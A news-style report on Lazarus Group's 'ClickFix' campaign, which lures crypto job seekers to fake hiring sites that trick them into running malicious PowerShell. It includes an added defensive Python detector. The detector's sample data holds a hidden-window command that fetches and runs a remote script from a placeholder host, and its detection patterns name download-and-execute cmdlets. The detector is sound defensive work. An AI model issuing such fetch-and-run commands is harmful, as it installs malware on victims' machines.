Lazarus Group Targets Crypto Job Seekers with "ClickFix" Social Engineering Scheme
North Korea's Lazarus Group has refined its cyberattack strategy by exploiting job seekers in the cryptocurrency sector through a new tactic dubbed “ClickFix,” as detailed in a Sekoia report. The group now targets non-technical professionals (e.g., marketing, business development) by impersonating major firms like Coinbase, Kraken, and Tether via fake job portals.
How ClickFix Works:
1. Fraudulent sites mimic hiring platforms, complete with application forms and video interview requests.
2. Users attempting to record videos receive fake error messages, prompting them to run malicious PowerShell commands disguised as troubleshooting steps.
3. This method exploits victims’ trust, as they believe they’re resolving technical issues rather than executing malware.
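A defender-side triage for step 2, added here as an illustration and not taken from the Sekoia report: it scores process-creation records for PowerShell that a user launched and that combines a hidden window, a web download and inline execution. The record field names, the indicator patterns, the threshold of 3 and the premise that the pasted command starts from explorer.exe (for example via the Run dialog) are assumptions of this example.

```python
import re

# Heuristics chosen for this example (assumptions, not indicators from the report).
INDICATORS = {
    "hidden_window": re.compile(r"(?<![\w-])-w(in\w*)?\s+h(id\w*)?\b", re.I),
    "encoded_command": re.compile(r"(?<![\w-])-e(nc\w*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "web_download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe"}
USER_PARENTS = {"explorer.exe"}  # Run dialog and shortcuts launch from the shell

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the list of indicators that fire for one process-creation record."""
    if basename(ev["image"]) not in SHELLS:
        return []
    reasons = [n for n, rx in INDICATORS.items() if rx.search(ev["command_line"])]
    if basename(ev["parent_image"]) in USER_PARENTS:
        reasons.append("user_launched")
    return reasons

def triage(events, threshold=3):
    """Hosts whose event matches at least `threshold` indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev["host"], reasons))
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records; hosts, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "mkt-laptop-07", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -w hidden -c "iwr https://example.invalid/fix.ps1 | iex"'},
    {"host": "it-admin-02", "parent_image": r"C:\Windows\System32\services.exe", "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"host": "dev-ws-11", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": 'powershell -c "irm https://example.invalid/api/status"'},
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}: review PowerShell launch ({', '.join(reasons)})")
```

Only the first constructed record crosses the threshold; the service-launched script and the single interactive web request stay below it, which keeps routine administration out of the review queue.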
Evolving Tactics:
The campaign, linked to 184 fake interview invites and 14 impersonated companies, builds on Lazarus’ earlier “Contagious Interview” attacks aimed at developers. While ClickFix focuses on psychological manipulation, the original campaign persists, suggesting the group is testing strategies across demographics. Both aim to deploy info-stealers through trusted channels.
Expanded Targets:
Lazarus now seeks access to sensitive data via roles beyond technical teams, highlighting a shift toward exploiting individuals with internal organizational access.
Linked to Bybit Hack:
The FBI attributed a $1.5 billion hack on crypto exchange Bybit to Lazarus, where attackers used fake job offers to plant malware (“TraderTraitor”) via poisoned trading software, enabling private key theft and unauthorized transactions.
Conclusion:
Lazarus continues to refine its social engineering tactics, blending technical sophistication with psychological manipulation to exploit the crypto industry’s competitive job market.